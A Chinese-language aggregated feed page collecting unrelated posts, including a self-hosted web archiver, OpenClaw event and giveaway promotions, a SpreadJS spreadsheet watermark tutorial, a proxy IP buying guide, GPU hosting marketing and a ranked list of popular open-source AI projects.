包含关键字 typecho 的文章

一个自托管的个人网页归档系统,自动捕获并保存你在 Chrome 中浏览过的网页 — HTML 、CSS 、JavaScript 、图片等一应俱全。当原始网页无法访问时,你仍然可以通过归档副本还原当时的页面样式和内容。

index

v2ex

x

工作原理

Chrome + Tampermonkey ──HTTP POST──▶ Go 服务器 ──▶ PostgreSQL (元数据)
  (关闭标签页 / 页面跳转                │              + 文件系统 (静态资源)
   时自动捕获)                          │
                                        ▼
                                     Web UI ──▶ 浏览 / 搜索 / 还原
  1. Tampermonkey 用户脚本在浏览器中运行,当你离开页面时自动捕获完整的 DOM 和资源。
  2. Go 服务器接收快照,下载浏览器因 CORS 限制无法获取的跨域资源,基于内容哈希去重后存储到本地。
  3. 内置 Web UI 可以浏览、搜索和还原任意归档页面 — 完全离线,不依赖外部服务。

功能特性

  • 高保真还原 — CSSOM 序列化、计算样式内联、防刷新保护,尽可能还原页面原始效果
  • 完整页面捕获 — HTML 、CSS 、JS 、图片、字体;资源 URL 自动重写为本地路径
  • 跨域资源恢复 — 服务器端自动提取并下载被 CORS 拦截的资源
  • 内容哈希去重 — 相同资源跨页面共享,仅存储一份( SHA-256 )
  • 版本历史 — 同一 URL 可多次归档,按时间戳区分
  • 智能去重 — 会话级 + 服务器级双重去重,内容无变化时仅更新访问时间
  • 动态内容支持 — 捕获实时 DOM 状态; MutationObserver 监听变化,超过阈值自动提交一次更新
  • SPA 感知 — 检测单页应用导航,按路由重置捕获状态
  • 防刷新保护 — 归档页面被冻结:定时器、WebSocket 和导航 API 均被拦截
  • Web UI — 响应式界面,支持全文搜索(页面内容、URL 、标题)、按时间范围筛选和还原归档页面
  • RESTful API — 提供完整的归档和查询接口

欢迎体验

https://github.com/icodeface/wayback-archiver

如果有一天,你的 AI Agent 不仅能帮你写邮件、订机票,还能主动去“市场”上雇佣人类来完成它搞不定的任务——你会不会觉得,这离科幻片又近了一步?

这不是想象,OpenClaw 正在让这一切成为可能。

3 月 13 日(周五)17:30-18:30,「虾塘造物」系列直播第一期正式开播。极客邦科技创始人霍太稳,与 白话 Agent 主理人、100agent 计划发起人古德白,将展开一场关于“AI 雇佣人类”的脑洞对谈。主题很直接:

当我用 OpenClaw 建造了一个帮 Agent 雇佣人类的市场

嘉宾阵容

霍太稳

极客邦科技创始人、模力工场创始人,技术社区构建者。作为观察者与赋能者,他将从行业高度拆解 OpenClaw 带来的可能性。

古德白

TGO 鲲鹏会上海会员、白话 Agent 主理人,全网粉丝 10 万+。自媒体圈最懂 AI 技术,AI 圈最会玩短视频的科技博主。他正在挑战 6 个月开发 100 个行业 AI 智能体,是真正的实战派。

直播看点

看点一:古德白现场跑任务,OpenClaw 实战演示

自我介绍之后,古德白会当场用 OpenClaw 跑一个小任务。5-10 分钟后回收结果——是骡子是马,拉出来遛遛。

看点二:OpenClaw 在 AI 历史中的位置

如果 ChatGPT 是 AI 的 iPhone 时刻,那 OpenClaw 可能是什么?两位嘉宾将展开一场“AI 编年史”式讨论。

看点三:未来预测——AI 雇佣人类的协作模式

当 AI 足够强大,它会不会反过来“雇佣”人类完成那些它不擅长的活儿?一个叫 “硅碳交易所” 的新概念将在直播中首次公开。

看点四:福利放送

直播间将免费开放 OpenClaw 资源包(含入门教程、AI Agent 案例合集、模力虾塘社群邀请)。

另外,我们会在直播社群中抽出 5 位用户赠送古德白一对一线上装机指导,并送出 1 张价值 330 元的 2050 大会门票——4 月 26 日,杭州,一场属于年轻创造者的聚会等你来。

直播信息

  • 时间:3 月 13 日(周五)17:30-18:30

  • 平台:模力工场视频号、InfoQ 视频号、AI 前线视频号、霍太稳视频号 联合直播

  • 预约方式:点击下方按钮预约直播,或扫码加入「模力虾塘群」,获取资源包及抽奖资格。

如果你也在思考 AI Agent 的下一站,或者单纯好奇 OpenClaw 到底能玩出什么花活——周五傍晚,直播间见。

扫码预约直播或扫码进群,提前和“龙虾”互动 👇

扫码进群,抢红包,抽小龙虾 AI 主机!实现 OpenClaw 龙虾自由!!!

最近 OpenClaw 小龙虾特别火爆,它能帮你处理很多事情,特别是打杂任务是它的专精项。
这么好的软件,需要部署在一台有网络共享能力的电脑之上,懒猫微服正是一款这样的设备。

现在懒猫微服送好礼,参与活动就有机会获得小龙虾 AI 主机一台!!!


抽奖规则(必看)

  1. 收藏帖子,在评论区评论:
    “扫码进群,抢红包,抽小龙虾 AI 主机!实现 OpenClaw 龙虾自由!”
  2. 扫二维码进「懒猫微服小龙虾抽奖群」
    二维码满员可添加帖子底部工作人员微信邀请进群。


开奖时间和规则

  • 开奖时间:3 月 17 日(周二)晚上
  • 开奖方式:拼手气红包开奖
    所有奖品对应拼手气红包,运气王获得对应奖品
    (多个红包时,金额最高者为运气王)


💎 奖品列表

  1. 价值 4399 元「懒猫微服 LC-02 小龙虾 AI 主机」× 1 套
  2. 价值 299 元「 CHERRY MX1.1 茶轴机械键盘」+「 499 元懒猫微服小龙虾 AI 主机优惠券」× 2 套
  3. 价值 99 元「懒猫微服文化 T 恤」+「 499 元懒猫微服小龙虾 AI 主机优惠券」× 3 套


优惠券使用规则

  • 中奖优惠券仅用于小程序购买
  • 不与京东分期优惠叠加
  • LC-03 基础款利润微薄,不参与任何优惠活动


特别提醒

  1. 必须进入「懒猫微服小龙虾抽奖群」,才能参与抢红包拼手气。
  2. 中奖用户需将活动参与截图 + 主页截图发给工作人员验证。


购买渠道和优惠

  1. 京东
    搜索「懒猫微服」下单,享受京东免息分期:


    • 32G+2T:6 期免息分期
    • 48G 无盘:6 期免息分期
  2. 全新系列懒猫 AI 算力舱已上线
    添加微信获取最新优惠价格。

  3. 懒猫零元购
    微服用户每移植一款应用到懒猫商店,即可得百元红包
    原创应用奖励翻倍
    撰写一篇攻略可得 50 元红包,多移多得,无上限。

在日常办公中,我们经常需要在Excel文件里添加水印,例如印上公司Logo维护品牌形象,或者加上“草稿”字样避免被当作最终版本使用。这些需求看似简单,但当我们把这些表格搬到Web系统中,面对多用户访问、动态数据更新、安全审计等场景时,传统的Excel水印方案就开始显得力不从心了。如何在企业Web应用中优雅的解决水印问题,是企业应用系统规范化、安全化始终要考虑的问题之一。

一、水印的第一种境界:静态标识

这是最基础、最常见的水印需求——在文件上固定显示一段文字或一个图片,用来标识文档的当前状态。

Excel中的实现方式

Excel用户通常会采用三种手工方法:

1.页眉页脚法

插入图片到页眉页脚,可实现打印水印。通过调整图片尺寸(如设置为500%以上)并设置“冲蚀”效果,可以铺满全页作为背景。

优点:操作简单,打印时自动显示,不影响单元格内容编辑。

缺点:只能插入图片,且在所有页面上位置固定,无法实现编辑时水印。
在这里插入图片描述
在这里插入图片描述

2.形状/艺术字法

插入文本框或者艺术字,并调整透明度、旋转角度,视觉效果灵活。

优点:自定义程度高,可任意旋转,调整颜色及透明度。

缺点:可能会影响单元格编辑,无法快速填充完整个显示界面。
在这里插入图片描述

在这里插入图片描述

3.背景图片法

在页面布局中设置背景图,操作最简单但无法打印,背景图片单独作用在某个工作表上,因此可以为不同的工作表设置不同的背景图片。

优点:操作简便快捷,图片可以平铺整个工作表区域。

缺点:无法实现打印水印。

这些方法足以应对个人办公场景下的基本需求,操作直观,无需特殊产品权限。

SpreadJS的对应实现

作为一款对标Excel的纯前端表格控件,SpreadJS继承了Excel的操作体验,同时提供了更灵活的编程接口:

// 单元格级水印 - 在空白单元格显示提示文字
let style = new GC.Spread.Sheets.Style();
style.watermark = "请输入内容";
sheet.setStyle(0, 1, style);

在这里插入图片描述

// 打印水印 - 精确控制位置和样式
var printInfo = sheet.printInfo();
var watermark = {
    x: 100, y: 200, width: 300, height: 150,
    imageSrc: "logo.png",
    page: "all"
};
printInfo.watermark([watermark]);

![在这里插入图片描述](https://i-blog.csdnimg.cn/direct/0cfb621375324d52b88e97c1463f...

// 背景图水印
sheet.backgroundImage("imageURL/base64")

在这里插入图片描述

在Web应用中,SpreadJS的这些能力可以很好地集成到业务系统中,结合业务流程,调用相关API,让水印根据业务流程动态呈现,而非手工添加的“补丁”。

二、水印的第二种境界:动态生成及安全追朔

当表格从个人办公走向企业协作,水印的需求也会随之升级。它不再是一成不变的静态内容,而是需要根据上下文动态生成。

典型场景

  • 财务报表需要显示当前的导出时间;
  • 人事报表需要根据查看者角色显示不同权限提示或登录名称;
  • 客户资料需要在每个页面角落印上查询条件。

Excel中的动态水印方案

很多人可能不知道,Excel其实也具备这种动态水印能力,只是它属于企业级安全功能,门槛较高:

  1. 技术原理:这是Microsoft 365的信息保护体系的一部分,基于敏感度标签自动生成。IT管理员在Microsoft Purview合规门户中配置动态水印策略,设置水印显示的内容变量,如{UserName}{UserEmail}{DateTime}
  2. 配置流程

    1. 企业需购买Microsoft 365 E5、E3等特定许可证
    2. IT管理员创建并配置敏感度标签,开启“动态水印”选项
    3. 文档作者为文件应用该标签
    4. 此后任何人打开文件,系统会自动读取登录人信息并渲染水印
  3. 优缺点分析

    1. 优点:安全可追溯、策略强制、自动生效
    2. 缺点:需要高级许可证、依赖IT配置、普通用户无法自行启用

这意味着,Excel的动态水印虽然强大,但对绝大多数企业来说,实施门槛较高,且无法灵活定制。相比之下,SpreadJS提供了一种更亲民的实现方式,只需几行代码,就能达到同样的安全效果:

SpreadJS的轻量化实现

借助Web技术的灵活性和SpreadJS内置的设置水印相关API,SpreadJS可以轻松实现这些动态需求:

// 根据当前时间动态生成水印
function createWatermarkImage(text, width, height) {
    const canvas = document.createElement('canvas');
    canvas.width = width;
    canvas.height = height;
    const ctx = canvas.getContext('2d');
    // 清空背景(透明)
    ctx.clearRect(0, 0, width, height);
    // 设置文字样式
    ctx.font = 'bold 36px Microsoft YaHei, SimHei, sans-serif';
    ctx.fillStyle = 'rgba(180, 180, 180, 0.35)';
    ctx.textAlign = 'center';
    ctx.textBaseline = 'middle';
    // 旋转并平铺文字
    ctx.save();
    ctx.translate(width / 2, height / 2);
    ctx.rotate(-Math.PI / 6); // 倾斜 -30 度
    ctx.fillText(text, 0, 0);
    ctx.restore();
    return canvas.toDataURL('image/png');
}
const now = new Date();
const pad = n => String(n).padStart(2, '0');
const timeText = `${now.getFullYear()}-${pad(now.getMonth() + 1)}-${pad(now.getDate())} ${pad(now.getHours())}:${pad(now.getMinutes())}:${pad(now.getSeconds())}`;
const watermarkDataUrl = createWatermarkImage(timeText, 600, 250);
sheet.backgroundImage(watermarkDataUrl);

在这里插入图片描述

这种动态生成能力,让水印真正成为业务数据的一部分,而不是一个孤立的装饰元素。

企业级的防泄露手段

在一些高度敏感的业务场景中(如财务报表、客户信息、研发文档),仅仅标记“机密”是不够的。当文件被拍照或截图流出时,我们需要能够追溯到是谁泄露了这份文件。

这正是“动态用户水印”的价值所在,张三打开文件,背景显示“张三的信息”;李四打开文件,背景自动变成“李四的信息”。每一份流出文件上都带着查看者本人的身份信息,形成有效的威慑和追溯依据。

在这里插入图片描述

三、SpreadJS的独特价值:在兼容中超越

作为一款纯前端的JavaScript表格控件,SpreadJS一直坚持一个理念:深度兼容Excel,同时发挥Web优势

让Excel资产保值增值

我们深知,绝大多数企业都积累了海量的Excel模板和历史数据。因此,SpreadJS在设计和开发过程中,始终把Excel兼容性作为核心指标:

  • 文件格式兼容:支持导入导出Excel文件(xlsx、xlsm、csv等),保留数据、样式、公式、图表等元素,历史文件资产得以最大程度复用。
  • 操作体验继承:熟悉Excel的用户可以快速上手SpreadJS,学习成本极低,无需二次培训。

为Web应用而生

在兼容的基础上,SpreadJS充分发挥了Web技术的优势,实现了Excel难以企及的能力:

能力维度SpreadJS的优势
部署便捷纯前端控件,无需安装任何插件,浏览器即开即用
系统集成可无缝对接各类后端API,实现数据实时交互
协同支持支持多用户在线编辑,数据实时同步
二次开发提供丰富的API接口,可按需扩展功能
动态水印深度业务融合,基于业务需求完成各种水印需求

从静态标识到动态生成及安全追溯,水印能力的层层递进,正是SpreadJS在兼容Excel的同时,不断拓展表格应用边界的缩影。回到水印这个话题本身。无论是Excel还是SpreadJS,水印都只是一个工具,真正重要的是它背后承载的业务价值:

  • 它可以是文档管理中的一道“提醒线”,防止误操作;
  • 它可以是品牌形象的“展示窗”,在每份输出上留下印记;
  • 它更可以是数据安全的“防护网”,对每一次访问留下可追溯的证据。

如果企业正在规划WEB表格应用系统,不妨思考一下:你的水印需求停留在哪个境界?现有的Excel方案能否满足?当表格从桌面走向云端,从单机走向协同,水印这件事,或许值得重新考虑一下。

免费体验活动

官网地址:https://ai.17nas.com/

10 名随机直接送 50 美元

记得说明你的需求,这样会优先赠送体验

回帖时记得带上 ID,参考下图 👇

回帖示意图


另外,其他国产模型也可以免费使用:

国产模型示意图


🧪 Mini 新人体验套餐(可用 Opus 4.6 )

适合刚入门试用的小套餐:

项目 说明
体验时长 3 天
每日额度 $10 / 天
总额度(合计) $30
有效期 3 天
额度重置 每天重置
升级分组 svip


温馨提示

  • 前 10 名为随机赠送;
  • 描述清楚自己的使用需求,更容易获得优先体验资格;
  • 回帖时别忘了附上自己的 ID

通勤路上、开会前、临时要改数据的时候,表格问题往往都是现在就得处理。
但手机操作表格这件事,确实不太方便。

所以这次,我们把表答做进了小程序:【表答】说句话让 AI 处理表格 excel
你只需要用语音或打字告诉 AI 需求,剩下的表格整理、计算处理和数据分析,都会自动完成。

目前,小程序已经支持这些场景:

1. 表格编辑 / 计算处理

上传表格或 Excel 后,AI 可以直接帮你完成整理格式、拆表并表、优化结构、公式处理、批量计算等常见操作,也支持图生表
如果不想从零开始做表格,还可以直接使用现有的 100+ 种表格模板。不管你手里已经有表,还是想直接做一张新的,都能更快搞定。
!!

2. 数据分析 / 报告生成

除了处理表格,小程序现在也支持直接做数据分析。你可以基于表格内容完成趋势分析、结构分析、异常识别、情感分析、共词分析、词频统计等任务。
分析完成后,AI 还会自动生成包含 19+ 图表 的完整报告,方便直接用于汇报和决策参考

3. 复制内容,一键生成表格

有时候,你手里的内容并不是现成表格,而是网页信息、零散数据,或者一段文字。直接复制进来,AI 就会自动帮你整理成结构化表格
![图片]

如果你也有临时处理表格、做数据分析的需求,快来试试表答小程序。

在跨境电商、社媒运营、数据采集以及网络测试等场景中,动态代理IP已经成为很多企业和个人用户的重要工具。不过,当真正准备使用的时候,很多人会遇到这样一个问题:动态代理IP哪家好?应该如何选择?

市面上的代理服务商有很多,价格、质量和稳定性等方面的差异也很大,如果是新手购买,很容易踩坑。本文IPDEEP小编将从几个维度,帮助大家快速判断一个动态代理IP服务商是否值得选择。

动态代理IP哪家好?一篇文章帮你看懂如何选择

一、什么是动态代理IP?

动态代理IP指的是IP地址会自动更换的代理服务。用户在使用代理访问网站时,系统会按照一定规则自动切换IP,这样可以避免长期使用同一IP带来的限制问题。

相比较静态IP,动态IP通常具备如下特点:

IP会定期或按请求更换

IP池规模较大

更适合大规模请求任务

因此,动态代理IP在以下场景中使用非常普遍:

跨境电商多账号管理

海外社媒运营(如TikTok、Instagram等)

数据采集与市场调研

SEO监控与广告验证

二、判断动态代理IP好坏的4个核心指标

1.IP池规模

IP池大小直接决定了代理资源的丰富程度。

如果IP数量太少,频繁使用同一批IP,很容易被目标网站识别并限制访问。一般来说,优质的动态代理服务商通常拥有百万级甚至更大的IP池,覆盖多个国家和地区。

IP池越大,IP轮换效果就越好。

2.地区覆盖能力

对于很多用户来说,IP的国家和地区分布非常重要。

例如:

数据采集需要多地区IP避免限制

社媒运营可能需要特定国家IP

做跨境电商可能需要美国、英国、日本等IP

因此,一个优质的动态代理IP服务商通常会提供:

城市级定位

灵活的IP切换方式

全球多个国家IP

3.IP质量与纯净度

IP质量是影响使用体验的核心因素。

一些廉价代理服务商的IP可能已经被大量用户使用过,甚至被很多网站列入黑名单,这种IP基本无法正常使用。

好的动态代理IP通常具有以下特点:

IP来源真实

被封禁概率低

使用记录干净

可稳定访问目标网站

4.网络稳定性

代理IP并不仅仅是“能连接就行”。如果连接不稳定,会影响任务效率。

常见问题包括:

延迟过大

频繁掉线

连接失败率高

稳定的代理网络通常会提供:

多节点服务器

高并发支持

自动IP轮换机制

这些都会直接影响到实际的使用体验。

三、动态代理IP哪家好?选择时要注意这些问题

在选择代理IP服务商时,建议重点关注以下几点:

1.是否支持免费测试

很多靠谱的代理服务商都会提供试用,这样可以先测试IP质量。

2.客服和技术支持

代理IP在使用过程中难免会遇到问题,是否有及时的技术支持也很关键。

3.价​格是否透明

一些代理服务商价格看似便宜,但会存在带宽限制或隐藏费用,需要提前了解清楚。

4.是否支持API或软件接入

如果需要大规模使用,API接口非常重要,可以方便程序自动调用代理IP。

四、总结

其实并不存在绝对最好的代理服务商,关键还是要根据自己的使用场景进行选择。一般来说,一个优质的动态代理IP服务商应该具备以下特点:

1.IP池规模大、

2.IP质量高

3.网络稳定

4.支持全球多地区IP

5.提供良好的技术支持

在正式购买之前,建议先进行测试,对于同服务商的实际效果,再做最终决定。

现在IDC圈里聊到高性能计算,昇腾910b和NVIDIA A100这两款GPU绝对是绕不开的话题。特别是随着大模型训练、科学计算这类业务越来越普及,企业对高性能算力的需求已经不再是“有就行”,而是要求稳定、高效、可扩展。先说说A100,这是NVIDIA在数据中心级GPU里的旗舰产品,单卡FP16算力接近312 TFLOPS,配合40GB/80GB HBM2e显存和多卡NVLink互联,特别适合千亿参数级别的模型训练和推理。而昇腾910b作为国产高端AI芯片的代表,算力也达到了320 TFLOPS(FP16),在不少自然语言处理和视觉类任务中表现非常扎实,尤其适合有国产化要求的企业。
图片
这类高性能GPU在IDC托管和租用业务中为什么越来越重要?因为很多企业发现,自建GPU集群不仅投入大,运维也很复杂——比如A100对供电、散热和网络的要求都比普通服务器高得多。而在极云科技这样的专业IDC环境里,我们为A100和910b部署了专用机柜,配备2N冗余供电和液冷散热系统,网络上也采用100G RoCE架构,确保多卡并行计算时不会出现通信瓶颈。能耗也是企业非常关心的一点。A100和910b虽然性能强,但能效比控制得不错。A100支持MIG技术,可以把一张物理卡拆分成多个实例给不同用户使用;910b也具备类似的弹性调度能力。在极云科技托管的GPU服务器,我们还会根据负载动态调节功率,帮企业把电费控制在合理范围。对于预算有限或者业务有波动的企业,租用搭载A100或910b的服务器是个务实的选择。你既不用一次性投入几百万元买设备,也不用操心运维细节,按需租用、灵活计费,特别适合项目制或短期高负载任务。极云科技提供的GPU租用服务支持月付、年付甚至按小时计费,配置从单卡到8卡一体机都有,企业可以根据训练任务灵活选择。当然,高性能也意味着高成本。A100和910b都不便宜,企业在选型时要根据业务类型、软件生态和预算综合判断——比如是否需要CUDA生态、是否要求国产化、模型规模有多大。不确定的话,极云科技也支持测试机申请,你可以先跑一下自己的业务负载,再决定用哪款卡。总的来说,910b和A100代表了当前AI算力的两个重要方向。把它们部署在专业的IDC环境中,不仅能发挥出最大性能,还能帮企业省去硬件管理和运维的麻烦。如果你正在规划GPU算力架构,欢迎来极云科技看看。我们从硬件选型、机房部署到运维支持,都能提供符合企业实际需求的A100与910b服务器解决方案。

以前偶然了解到整数型 IP,只是觉得好玩,没有想到什么用处,到后面有一次做 IPwhois 的时候才用到。

我们知道 ipv4 是 32 位 2 进制,A.B.C.D 是为了给人类看的,点分十进制表示法。
IPv4address = dec-octet "." dec-octet "." dec-octet "." dec-octet
见: https://www.rfc-editor.org/rfc/rfc3986

IPwhois 需要知道某个 IP 是否属于某个范围,比如 192.168.1.10 是不是在 192.168.1-255 里面,我不可能拿 string 去比对,换成十进制就好多了,只需要比对数值的大小就知道是不是在范围内。

IP 整数 =
a × 256³ +
b × 256² +
c × 256¹ +
d
image
转换为整数 IP

image
整数 IP 自动转换

原文链接:https://www.nocobase.com/cn/blog/best-open-source-ai-projects-github-2026

最近几个月,OpenClaw 彻底引爆了 AI 圈,媒体、社区与开发者论坛内讨论不断,掀起了一股全民“养龙虾”热潮。在 GitHub 的 AI 热门榜单上,它的 Star 数更是一路狂飙,直接登顶。

open claw star.PNG


💬 嗨!你正在阅读 NocoBase 博客。NocoBase 是一个极易扩展的 AI 无代码/低代码开发平台,用于构建企业应用、内部工具和各类系统。它完全支持自托管,基于插件架构设计,开发者友好。→ 欢迎在 GitHub 上了解我们


有媒体直接把 OpenClaw 写成 “The Rise of a New King on GitHub”。如果只把它理解成一次单纯的项目爆红,可能还是低估了这波热度背后的变化。从 OpenClaw 开始,2026 年开源 AI 关注重点也在明显转移。

去年,我们也盘点过 GitHub 上最受关注的 20 个开源 AI 项目,当时榜单里热门项目的核心仍然是模型能力、聊天界面以及开源路线是否能逼近闭源产品体验。但今年榜单里的项目已经发生了翻天覆地的变化。开源 AI 的关注重点已经在进一步转向智能执行、流程编排、多模态生成等更贴近实际应用的方向。

基于这个变化,我们重新盘点了 2026 年 GitHub 上 Star 最高的 20 个开源 AI 项目,并做了简单分类。从中选出部分代表性项目,介绍它们各自的核心能力、功能特点,以及各自在 AI 方向上的独特价值。

2026 年最值得关注的 20 个开源 AI 项目

以下项目按 GitHub Star 数排序

排名项目名称Star核心关键词适用人群一句话定位GitHub 链接
1OpenClaw302k智能执行个人面向个人场景的开源 AI 助手,强调跨平台执行任务openclaw/openclaw
2AutoGPT182k智能执行开发者经典的自主智能体项目,强调任务拆解与自主执行Significant-Gravitas/AutoGPT
3n8n179k流程编排企业支持原生 AI 能力的工作流自动化平台n8n-io/n8n
4Stable Diffusion WebUI162k多模态生成创作者面向 Stable Diffusion 的经典网页交互界面AUTOMATIC1111/stable-diffusion-webui
5prompts.chat151k提示词资源个人开源提示词社区与提示词收藏平台f/prompts.chat
6Dify132k流程编排企业面向智能体工作流的生产级 AI 应用开发平台langgenius/dify
7System Prompts and Models of AI Tools130k研究资料开发者汇总多种 AI 工具系统提示词、内部工具与模型信息的资料仓库x1xhlol/system-prompts-and-models-of-ai-tools
8LangChain129k流程编排开发者面向大模型应用与智能体开发的编排框架langchain-ai/langchain
9Open WebUI127k应用入口个人面向 Ollama、OpenAI API 等模型的 AI 交互界面open-webui/open-webui
10Generative AI for Beginners108k学习资源开发者面向生成式 AI 初学者的系统课程仓库microsoft/generative-ai-for-beginners
11ComfyUI106k多模态生成创作者基于节点工作流的图像生成界面与后端Comfy-Org/ComfyUI
12Supabase98.9k数据与上下文企业支持 Web、移动与 AI 应用的数据平台supabase/supabase
13Gemini CLI97.2k智能执行开发者将 Gemini 能力带入终端场景的开源 AI 智能体google-gemini/gemini-cli
14Firecrawl91k数据与上下文开发者将网站转成可供大模型直接使用数据的网页数据接口firecrawl/firecrawl
15LLMs from Scratch87.7k学习资源开发者从零实现类 ChatGPT 大模型的教学项目rasbt/LLMs-from-scratch
16awesome-mcp-servers82.7k工具连接开发者收录 MCP Server 的开源项目清单punkpeye/awesome-mcp-servers
17Deep-Live-Cam80k多模态生成创作者支持实时换脸与视频生成的开源工具hacksider/Deep-Live-Cam
18Netdata78kAI 运维企业引入 AI 能力的全栈可观测平台netdata/netdata
19Spec Kit75.7kAI 工程开发者面向规范驱动开发的工具包github/spec-kit
20RAGFlow74.7k数据与上下文企业融合 RAG 与智能体能力的上下文引擎infiniflow/ragflow

从表格里也能看出,这些项目并不完全是同一种类型。像学习资源、提示词资源和研究资料这类项目,更适合作为补充参考;如果要看今年开源 AI 的核心热点,还是要回到更有代表性的产品和工具上。所以下面我们会围绕四个方向继续展开介绍:智能执行、流程编排、数据与上下文,以及多模态生成。

智能执行

OpenClaw

OpenClaw1.PNG

相信大家对 OpenClaw 已经很熟悉了,我们这里还是再简单介绍一下。

OpenClaw 是一个面向个人场景的开源 AI 助手,核心定位是把 AI 接进用户已经在使用的沟通环境里,不用再单独做一个新的入口。它本身也是一个自托管网关,强调运行在自己的设备和规则之下,更贴近开发者和高频个人用户的使用习惯。

核心能力

把 AI 助手放进现有消息渠道和设备环境里

OpenClaw 可以接入 WhatsApp、Telegram、Discord、iMessage、Feishu 等多个渠道,在同一个 Gateway 下处理消息、会话和路由。同时,它支持语音唤醒、持续语音、Live Canvas,以及 iOS、Android、macOS 等多端节点能力,让 AI 不只是停留在聊天框里,而是可以跟消息、设备和交互界面一起工作。

OpenClaw2.png

具备持续在线和可继续扩展的结构

OpenClaw 可以在本地机器或服务器上运行一个 Gateway 进程,再通过各类消息渠道持续接收和响应请求。除此之外,它还支持插件扩展,除了默认能力之外,也可以通过扩展包继续接入 Mattermost 等更多渠道和功能。

OpenClaw3.png

AutoGPT

AutoGPT1.png

AutoGPT 是一个围绕 AI 智能体构建的开源项目,核心定位不只是提供一个可直接使用的助手,而是进一步把智能体的创建、部署和运行组织成一套更完整的平台能力。相比更偏单点使用的产品,它更强调把智能体从实验性体验推进到可持续运行和可继续扩展的形态。

核心能力

围绕智能体的创建、部署和运行提供更完整的平台结构

AutoGPT 关注的重点是把构建、部署、管理和运行这些环节放到同一套体系里处理。它已经不只是一个早期 autonomous agent 项目,而是在往更完整的智能体平台方向延伸。

AutoGPT2.png

持续运行和长期任务承接

AutoGPT 支持持续运行的智能体形态,也延伸出了平台、市场和能力模块等配套内容,更适合承接自动化任务和长期工作场景。和更偏个人助手的产品相比,它更接近开发者和平台使用场景,也更偏向企业和构建侧。

Gemini CLI

Gemini CLI1.png

Gemini CLI 是 Google 推出的开源 AI 智能体工具,核心形态是把 Gemini 的能力直接带到终端里使用。相比更偏聊天入口的产品,它更贴近开发者日常工作环境,重点放在本地项目上下文、命令行操作和连续任务处理这些更真实的开发场景里。

核心能力

把 AI 直接带进终端和本地项目环境

Gemini CLI 可以直接在终端中调用 Gemini,处理代码理解、任务自动化和工作流构建等需求。同时,它也能结合本地项目上下文使用,让 AI 不只是回答问题,而是围绕代码、命令和文件持续参与具体任务。

Gemini CLI2.png

适合放进连续的开发流程里使用

采用 reason-and-act 的方式工作,支持结合内置工具以及本地或远程 MCP Server 来完成更复杂的任务,也支持自定义 slash commands。

流程编排

n8n

n8n1.png

n8n 是一个工作流自动化平台,把可视化编排、代码扩展和 AI 能力放在同一套工作流体系里。相比只做单点智能体或单一模型接入的工具,它更适合把模型、数据源、外部工具和业务流程连接起来,形成可以持续运行的自动化链路。

核心能力

把 AI 能力接进完整工作流里

n8n 支持用可视化画布搭建工作流,同时保留代码扩展能力,既能满足快速搭建,也能支持更深的定制。它可以连接数据源、AI 模型和外部工具,把业务流程自动化和 AI 工作流放到同一个系统里处理。

n8n2.png

AI 真正成为流程系统的一部分

n8n 已经提供 AI Agent、AI Workflow Builder、Chat Hub 等能力,不只是把模型接进流程里,还能继续把多步骤任务、工具调用和交互入口组织成更完整的自动化体系。它更接近团队和业务场景,也更适合让 AI 真正成为流程系统里的一部分。

Dify

Dify1.png

Dify 是一个面向大模型应用开发的开源平台,把 AI 工作流、RAG、智能体能力、模型管理和应用观测放在同一套产品体系里。相比更偏自动化工具的产品,它更贴近 AI 应用本身的搭建过程,重点放在从原型到生产环境这一整条链路上。

核心能力

可视化 AI 工作流搭建

Dify 提供可视化工作流画布,可以直接搭建和测试 AI 工作流,也支持接入大量闭源和开源模型,以及兼容 OpenAI API 的模型服务。对开发者和团队来说,这意味着很多 AI 应用不需要从底层反复拼装,就可以先把整体链路跑起来。

Dify2.png

模型、RAG 与应用观测的一体化能力

Dify 内置了完整的 RAG 能力、智能体工具能力和应用日志分析能力,不只是帮助把应用快速搭起来,也方便继续做调试、优化和上线后的维护。它更像是把 AI 应用开发和后续运营放到一个统一平台里处理,而不是拆成多套工具分别完成。

LangChain

LangChain1.png

LangChain 是一个面向大模型应用和智能体开发的开源框架,核心方向是把模型、工具、上下文和外部集成连接起来。相比更偏可视化工作流的平台,它更接近开发框架本身,适合用来搭建可控性更高、可定制程度更深的 AI 应用。

核心能力

组件化链路组织能力

LangChain 提供了大量可复用组件和第三方集成能力,方便把模型、工具、记忆和外部服务串成一条完整链路。对开发者来说,这种组件化方式最大的价值在于,不需要从零开始搭每一个环节,可以更快地把应用结构组织起来。

LangChain2.png

面向复杂智能体的编排基础

LangChain 可以快速搭建智能体,也能和 LangGraph 配合,继续往长流程、状态化和可控编排的方向延伸。再加上 LangSmith、Deep Agents 等配套模块,它已经逐渐成为一套围绕 AI 应用和智能体系统展开的基础骨架。

数据与上下文

RAGFlow

RAGFlow1.png

RAGFlow 是一个开源 RAG 引擎,核心方向是为大模型提供更可靠的上下文层,专注于把文档解析、数据清洗、检索增强和 Agent 能力放在同一套体系里。

核心能力

文档解析与数据预处理能力

RAGFlow 提供了内置的数据摄取和处理能力,可以清洗、解析多种格式的数据,并把它们整理成更适合检索和调用的语义表示。对于文档类型复杂、数据来源分散的场景来说,这一步其实很关键,因为上下文质量往往就决定了后面的回答质量。

RAGFlow2.png

围绕上下文构建完整的 RAG 链路

RAGFlow 支持基于文档理解的 RAG 能力,能够围绕复杂格式数据建立更可靠的问答和引用链路。同时,它也具备 Agent 平台和可编排的数据流能力,已经加入了工作流画布、Agent 节点和相关 API,更适合继续往企业级知识处理和复杂应用场景延伸。

RAGFlow3.png

Firecrawl

Firecrawl1.png

Firecrawl 是一个面向 AI 的网页数据接口,核心能力是把网站内容抓取、爬取并转换成适合大模型使用的结构化数据或 Markdown。相比传统爬虫工具,它更直接服务于 AI 应用和智能体场景,重点不在“把网页抓下来”,而在于把网页变成模型可用的上下文。

核心能力

网页抓取与结构化提取能力

Firecrawl 支持抓取、爬取、提取和搜索网站内容,并输出 Markdown、JSON、链接、截图、HTML 等多种格式。对 AI 应用来说,这一步的价值不只是拿到网页内容,而是能直接得到更适合模型处理的数据形态。

Firecrawl2.png

面向大模型应用的数据接入能力

Firecrawl 可以把整站内容整理成适合大模型调用的数据,也已经提供了 MCP Server、SDK 和示例项目,方便继续接入 Cursor、Claude 以及更多开发环境。它更适合那些需要接入外部网站信息、构建实时知识来源或增强检索能力的应用。

Supabase

Supabase1.png

